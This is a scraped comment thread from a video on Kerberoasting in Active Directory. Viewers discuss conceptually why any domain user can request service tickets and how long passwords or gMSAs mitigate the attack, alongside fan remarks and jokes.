Question. When you are enumerating the SPNs are the ones that are vulnerable the user must have access to correct? So if the HTTP SPN was vulnerable but the user did not have access to it they would not be able to get that TGS right?
I understand that. But not everyone has access to request the tgs correct? I.e sql server. Not everyone can get this ticket as only privileged accounts should be able to access it so the attacker would need to compromise this type of account. but if the compromised account was a normal user and requested the tgs wouldn’t it be not granted correct..?
Everyone can request a TGS, Domain Controller only provides Security Info about the user (PAC), it's up to the Service Account itself to check the user's rights in the TGS. The Security concern here is that DC use a piece of the secret of the requested service to encrypt the TGS which can be later used to brute force/crack the password.
No, domain admin and schema admin are not required for Kerberoasting. Those were just used to set up an SPN in AD so that he had something to attack. The actual Kerberoasting was just the last 2 minutes of the video.
That's crazy - how does a typical AD setup prevent this? Is there some other system/service in place that prevents you obtaining hashes in the first place, or is it more so a matter of good password strength policies so that something like John can't crack the hashes as easily?
i mean .... yeah; with domain admin privileges anything is possible. So? Thats like saying "root bad! root evil!". Yes. Yes, it is. Very. Much more than you can imagine. So?
This guy is unstoppable, never misses a video, so damn consistent,❤
as a CRTE and CARTP holder, im glad to see alteredsec sponsoring the video. hopefully we'll see the certs appear on more job posting.
So by just getting a user on a domain you can get the TGT and TGS from the domain controller,cos it sees you as an authenticated user on the system..
Thanks. I have done kerberoasting before but never understood what I was doing at this level. Super cool stuff.
Good stuff John. Thanks.
first time i needed the subscribe and alarm bell button
Great video man!
So this is why you've been asking twitter for the password? 😂
😂😂😂😂😂
Great job...greetings from italy
I still miss the honey badger video :(
I was contemplating sending a secret message to kelly ripa on X saying that I learned that she was basically on soultrain from Questlove.
Simply amazing!!!
Awesome content 👏
Any valid coupons for CRT? :)
Finally man
What windows server version did you use ?
Question. When you are enumerating the SPNs are the ones that are vulnerable the user must have access to correct? So if the HTTP SPN was vulnerable but the user did not have access to it they would not be able to get that TGS right?
SPNs are not hidden. Everyone has access to them.
I understand that. But not everyone has access to request the tgs correct? I.e sql server. Not everyone can get this ticket as only privileged accounts should be able to access it so the attacker would need to compromise this type of account. but if the compromised account was a normal user and requested the tgs wouldn’t it be not granted correct..?
Everyone can request a TGS, Domain Controller only provides Security Info about the user (PAC), it's up to the Service Account itself to check the user's rights in the TGS.
The Security concern here is that DC use a piece of the secret of the requested service to encrypt the TGS which can be later used to brute force/crack the password.
So many of these attacks rely on already having domain admin or schema admin, or assume that the IT staff is hopelessly incompetent.
They often are
No, domain admin and schema admin are not required for Kerberoasting. Those were just used to set up an SPN in AD so that he had something to attack. The actual Kerberoasting was just the last 2 minutes of the video.
@@BrownCoatFanThanks
And there are plenty of incompetent AD admins out there .
It's amazing how a 22 minute video about kerberoasting only has about 2 minutes worth of kerberoasting
I’m sayin😂
@hammond
What OS do run on your baremetal ?
Most likely either a MacOS or an SE Linux distro
thanks 👍
That's crazy - how does a typical AD setup prevent this? Is there some other system/service in place that prevents you obtaining hashes in the first place, or is it more so a matter of good password strength policies so that something like John can't crack the hashes as easily?
Yes, use a very long (25 characters) and complex password.
Prefer GMSA if your App/System supports it. If not, a long, very complex password could help...
@@NawdiralgMSAs are so nice. Password lifetime of 24hrs and with length of 120chars. Also, they do not pretend to be user accounts.
🔥🔥🔥🔥🔥
It is a shame there's no easy way to snapshot an AD, no?
Use excalidraw next time 😂
Alh4zr3d, is it you 🤨🤭😅🥳
Taylor Jose Lee Jeffrey Williams Timothy
😃 🚀 ❤️
first
👑 here's your crown
@@baxsmthanks bud
Frist hehe
I like you, but this one was a weak video. The whole scripting thing is way too much to "learn Active Directory Kerberoasting".
i mean .... yeah; with domain admin privileges anything is possible. So? Thats like saying "root bad! root evil!". Yes. Yes, it is. Very. Much more than you can imagine. So?
Kerberoasting is done from any low privilege domain user. We used the domain user account "Alice".
You know, talking this fast, you're not really teaching anything as much as blowing through content that isn't digestible by people.
Every time I watch @johnhammond I just feel like an idiot, so unworthy 😞
I actively despise AD and I don't even have a logical reason for it. just gut feeling.
Pretty useless information if you have a minimum requirement of at least 13 characters with good complexity , a good EDR installed etc.....
@hammond
What OS do run on your baremetal ?
If you mean OS running on his real machine then it's Windows 10